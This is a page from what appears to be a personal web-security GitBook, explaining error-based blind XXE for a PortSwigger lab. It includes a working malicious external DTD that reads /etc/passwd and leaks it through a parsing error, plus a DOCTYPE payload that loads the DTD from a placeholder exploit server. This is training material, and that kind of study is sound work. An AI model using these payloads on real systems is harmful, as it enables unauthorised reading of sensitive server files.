Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  1. WebApp Security
  2. XXE Attacks
  3. Blind XXE Attacks

Blind XXE to LFI

PreviousExploitationNextBlind XXE by defining Local DTD

Last updated 2 years ago

An alternative approach to exploit a Blind XXE is to trigger an XML parsing error.

  • Where the error message brings us the sensitive information, might be effective when it's shown in the application's response.

We can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

  • Creates an XML parameter entity called file, which contains /etc/passwd

  • Creates an XML parameter entity called eval, which dynamically contains another entity called error. Error entity will be evaluated by loading a non-existent file, whose name contains the value of the file entity

  • Uses eval entity, which causes the error entity to be performed

  • Uses error entity, so it attempts to load a non-existent file

Resulting in an error message containing the name of the non-existent file, and gives the contents of /etc/passwd.

PortSwigger Exercises

Create a malicious XML entity and host it in your exploit server, save it

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Now insert an XML statement invoking the external DTD asusal

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://YOUR-EXPLOIT-DTD"> %xxe;]>

We can notice, we get a response giving us the contents of /etc/passwd